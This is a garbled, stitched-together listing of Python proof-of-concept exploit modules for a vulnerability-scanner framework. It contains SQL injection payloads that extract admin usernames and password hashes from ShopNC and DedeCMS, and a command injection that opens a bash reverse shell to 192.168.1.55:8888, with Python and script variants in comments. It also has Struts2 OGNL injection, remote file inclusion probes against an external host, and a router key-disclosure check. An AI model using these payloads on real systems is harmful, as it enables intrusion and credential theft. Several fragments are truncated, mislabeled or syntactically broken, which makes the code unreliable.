    # together from several PoCs. Confirm which application this targets.
    name = '_90650_shopnc_2008_place_sql_inj_PoC'
    appPowerLink = 'http://www.phpcms.cn'
    appName = 'Eduwind'
    appVersion = '2008'
    vulType = 'SQL Injection'
    desc = '''
        phpcms 2008 中广告模块,存在参数过滤不严,
        导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用,
        如果关闭了错误显示,可以采用基于时间和错误的盲注
    '''
    samples = ['http://10.1.200.28/']

    @require_header('cookie')
    def _attack(self):
        """Attack mode: POST the crafted address form under /shop/ (the ShopNC path used
        by another PoC in this listing), then GET the address page and pull '~'-prefixed
        tokens out of it.

        Returns the Output built by parse_attack.
        """
        result = {}
        url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
        vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
        payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a"
        values = list()
        values.append("form_submit=ok&id=&true_name[]=")
        values.append(payload)
        values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
        post_data = "".join(values)

        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        # NOTE(review): neither request sets a timeout; the POST response is discarded.
        req.post(vul_url, data=post_data, headers=headers)
        res = req.get(url)
        if res.status_code == 200:
            match_result = re.findall(r'~\w*', res.content, re.I | re.M)
            # NOTE(review): only non-emptiness is checked, but [1] is read below, so a
            # single match raises IndexError.
            if match_result:
                result['AdminInfo'] = {}
                result['AdminInfo']['Username'] = match_result[0][1:]
                result['AdminInfo']['Password'] = match_result[1][1:]
        return self.parse_attack(result)

    @require_header('cookie')
    def _verify(self):
        """Verify mode: interactive login followed by a POST to the profile-settings route
        and a check of the admin page.

        NOTE(review): the line after the getpass call is garbled in this listing
        (the masked '******' replaced part of the source), and `admin_result` /
        `find_result` are used without being assigned in the visible text — the login
        flow between those lines is missing. As shown this method does not parse.
        """
        result = {}
        #   Define the URLs used below.
        vul_url = urlparse.urljoin(self.url, '/index.php?r=me/setBasic')
        logout_url = urlparse.urljoin(self.url, '/index.php?r=u/logout')
        login_url = urlparse.urljoin(self.url, '/index.php?r=u/login')
        admin_url = urlparse.urljoin(self.url, '/index.php?r=admin/setting/site')
        #   Form body posted to the settings route (see the original comment: privilege payload).
        payload = "UserInfo%5Bname%5D=dubuqingfeng&UserInfo%5Bbio%5D=test&UserInfo%5Bintroduction%5D=&UserInfo%5BIsAdmin%5D=0&yt0="

        headers = {"Content-Type": "application/x-www-form-urlencoded"}

        # NOTE(review): interactive prompts (Python 2 raw_input/getpass) block an
        # unattended scan; credentials should come from the framework's options.
        email = raw_input("Email: ")
        password = getpass.getpass('password:'******'<a href="/index.php?r=admin">后台管理</a>')
            if find_result != -1:
                #   Reuse the session cookies from the login response.
                cookies = admin_result.cookies
                #   POST to the admin settings page with those cookies.
                get_shell_result = req.post(admin_url, cookies=cookies, headers=headers)

                # NOTE(review): prints session cookies and the full response body to
                # stdout — leaks live session material into logs; remove.
                print cookies
                print get_shell_result.content
                print get_shell_result.cookies

                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url
                result['VerifyInfo']['Postdata'] = payload
        return self.parse_attack(result)

    # NOTE(review): empty method body — SyntaxError as written; needs at least `pass`.
    def do_login(self):

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else a fixed failure message."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(EduwindPOC)  # register() comes from outside this file; presumably framework registration — confirm
            payload = {'ip': '127.0.0.1;bash -i >& /dev/tcp/192.168.1.55/8888 0>&1"', 'Submit': 'Submit'}
            response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)

            # 方法二 new bash Code
            # payload = {'ip': '127.0.0.1;echo "#\!/bin/bash\n\nbash -i >& /dev/tcp/192.168.1.55/8888 0>&1">shell.sh && ./shell.sh', 'Submit': 'Submit'}
            # response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)

            # 方法三 Python Shell 貌似这方法只适合手动跑
            # payload = {
            #     'ip'    : '127.0.0.1;python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'192.168.1.55\',8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);"&',
            #     'Submit': 'Submit'}
            # response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)

            result['extra'] = {}
            result['extra']['Shell'] = "OK! Open 'NC -lvv 8888' "
            return self.parse_output(result)

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def parse_output(self, result):
        """Build the Output for *result*: success when it holds data, else fail('Error')."""
        out = Output(self)
        if not result:
            out.fail('Error')
        else:
            out.success(result)
        return out


register(TestPoc)  # register() comes from outside this file; presumably framework registration — confirm
Content-Length: 171
Cookie: access_token=a049bd87-d8c6-4756-aa6a-46a357a8de36;
Content-Type: multipart/form-data; boundary=1c88e9afa73c438d93b5043a7096b207
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

--1c88e9afa73c438d93b5043a7096b207
Content-Disposition: form-data; name="image1"; filename="%{{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test-{randint1}','bey0nd')}}'\x00b"
Content-Type: text/plain


--1c88e9afa73c438d93b5043a7096b207--
    """.format(uri=uri, randint1=str(randint1))
        code, head, html, redir, log = curl.http(arg, raw=raw)
        # print head
        if code != 0 and "X-Test-%s" % str(randint1) in head:
            return True
        else:
            return False

    def parse_output(self, result):
        """Build the Output for *result*: success when it holds data, else fail('Failed')."""
        out = Output(self)
        if not result:
            out.fail('Failed')
        else:
            out.success(result)
        return out


register(Struts46POC)  # register() comes from outside this file; presumably framework registration — confirm
        if data != None:
            result = {'VerifyInfo': {}}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_result(result)

    def _attack(self):
        """Attack mode: GET plus/recommend.php with the crafted _FILES parameters and keep
        whatever text sits between '|' and '</h2>' in the response.

        Returns the Output built by parse_result.
        """
        result = {}
        # NOTE(review): self.url is concatenated with no separator — a base URL that does
        # not end in '/' produces a wrong path. No timeout is set.
        target = self.url + "plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"
        response = req.get(target)
        content = response.content
        # NOTE(review): non-raw pattern; '\|' survives only because Python keeps unknown
        # escapes. Use an r'' string for clarity.
        regex = re.compile('<h2>.*?\|(.*?)</h2>')
        data = regex.search(content)
        # NOTE(review): `is not None` is the idiomatic identity test.
        if data != None:
            # groups() yields a 1-tuple here; it is stored as-is, not unpacked.
            string = data.groups()
            result = {'VerifyInfo': {}}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['data'] = string
        return self.parse_result(result)

    def parse_result(self, result):
        """Build the Output for *result*: success when it holds data, else a fixed failure message."""
        out = Output(self)

        if not result:
            out.fail("Internet Nothing returned")
        else:
            out.success(result)
        return out


register(Fuckdede)  # register() comes from outside this file; presumably framework registration — confirm
            All discovered vulnerabilities can be exploited without authentication and therefore pose a high security risk.
           '''
    samples = ['']

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def _verify(self, verify=True):
        """Verify mode: GET the WLAN security-settings endpoint with no credentials and
        report a hit when both the <WifiWpapsk> and <WifiWpaencryptionmodes> tags appear.

        `verify` is accepted but never read; kept only for signature compatibility.
        Returns the Output built by parse_attack; the response body (which on a hit
        likely carries the pre-shared key) is deliberately not stored in result.
        """
        result = {}
        # The parentheses do not make a tuple; this is plain %-formatting of one value.
        vul_url = '%s/api/wlan/security-settings' % (self.url)
        # NOTE(review): no timeout; request errors propagate uncaught.
        response = req.get(vul_url).content

        # Literal tags used as regex patterns; no metacharacters, so substring tests.
        if re.search('<WifiWpapsk>', response) and re.search('<WifiWpaencryptionmodes>', response):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out


register(Huawei_E5331_Unauthorized_access)  # register() comes from outside this file; presumably framework registration — confirm
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL.
        """
        result = {}
        # The probe points `cropimagedir` at a file on an external host (tool.scanv.com);
        # presumably that file produces the marker checked below. If that host is
        # unavailable the check silently reports 'failed' (inconclusive).
        vul_url = '%s/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate uncaught.
        response = req.get(vul_url).content

        # Hex-only marker used as a regex pattern: equivalent to a substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL rather than the probe URL.
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out


register(Mambo_cropimage_Component_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()


    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL.
        """
        result = {}
        # The probe points `DOCUMENT_ROOT` at a file on an external host (tool.scanv.com);
        # presumably that file produces the marker checked below. If that host is
        # unavailable the check silently reports 'failed' (inconclusive).
        vul_url = '%s/includes/tgpinc.php?DOCUMENT_ROOT=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate uncaught.
        response = req.get(vul_url).content

        # Hex-only marker used as a regex pattern: equivalent to a substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL rather than the probe URL.
            result['VerifyInfo']['URL'] = self.url


        return self.parse_attack(result)


    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out

register(GnatTGP_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm
		result = {}
		target = self.url + "plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a"
		response = req.get(target)
		content = response.content
		if 'DedeCMS Error Warning!' in content:
			result = {'VerifyInfo':{}}
			result['VerifyInfo']['URL'] = self.url
		return self.parse_result(result)

	def _attack(self):
		"""Attack mode adds nothing over verify mode; delegate to it."""
		verify_mode = self._verify
		return verify_mode()

	def parse_result(self, result):
		"""Build the Output for *result*: success when it holds data, else a fixed failure message."""
		out = Output(self)

		if not result:
			out.fail("Internet Nothing returned")
		else:
			out.success(result)
		return out

register(Fuckdede)  # register() comes from outside this file; presumably framework registration — confirm








    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL.
        """
        result = {}
        # The probe points `REP_INC` at a file on an external host (tool.scanv.com);
        # presumably that file produces the marker checked below. If that host is
        # unavailable the check silently reports 'failed' (inconclusive).
        vul_url = '%s/genpage-cgi.php?REP_INC=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate uncaught.
        response = req.get(vul_url).content

        # Hex-only marker used as a regex pattern: equivalent to a substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL rather than the probe URL.
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out


register(Hitweb_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm
        parttern = '\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
        #发送请求
        resp = req.get(url=vulurl, headers=httphead, timeout=80)
        #检查是否含有特征字符串
        if '$~~~$' in resp.content:
            #提取信息
            match = re.search(parttern, resp.content, re.M | re.I)
            if match:
                #漏洞利用成功
                result['DbInfo'] = {}
                #数据库用户名
                result['DbInfo']['Username'] = match.group(1)
                #数据库版本
                result['DbInfo']['Version'] = match.group(2)
        return self.parse_output(result)

    def _verify(self):
        """Verify mode has no lighter-weight check here; it runs the attack path."""
        attack_mode = self._attack
        return attack_mode()

    def parse_output(self, result):
        """Build the Output for *result*: success when it holds data, else a fixed failure message."""
        # parse output
        out = Output(self)
        if not result:
            out.fail('Internet nothing returned')
        else:
            out.success(result)
        return out


register(TestPOC)  # register() comes from outside this file; presumably framework registration — confirm
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']

    def _attack(self):
        """Attack mode adds nothing over verify mode; delegate to it."""
        verify_mode = self._verify
        return verify_mode()

    def _verify(self):
        """Verify mode: request the include parameter and report a hit when the marker appears.

        Returns the Output built by parse_attack; on a hit result['VerifyInfo']['URL']
        holds the base URL. This body is identical to the dotWidget_CMS PoC earlier in
        this listing.
        """
        result = {}
        # The probe points `file_path` at a file on an external host (tool.scanv.com);
        # presumably that file produces the marker checked below. If that host is
        # unavailable the check silently reports 'failed' (inconclusive).
        vul_url = '%s/index.php?file_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        # NOTE(review): no timeout (other PoCs in this listing pass timeout=10); request
        # errors propagate uncaught.
        response = req.get(vul_url).content

        # Hex-only marker used as a regex pattern: equivalent to a substring test.
        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            # Records the base URL rather than the probe URL.
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Build the Output for *result*: success when it holds data, else fail('failed')."""
        out = Output(self)

        if not result:
            out.fail('failed')
        else:
            out.success(result)

        return out


register(FlatNuke_Remote_File_Include)  # register() comes from outside this file; presumably framework registration — confirm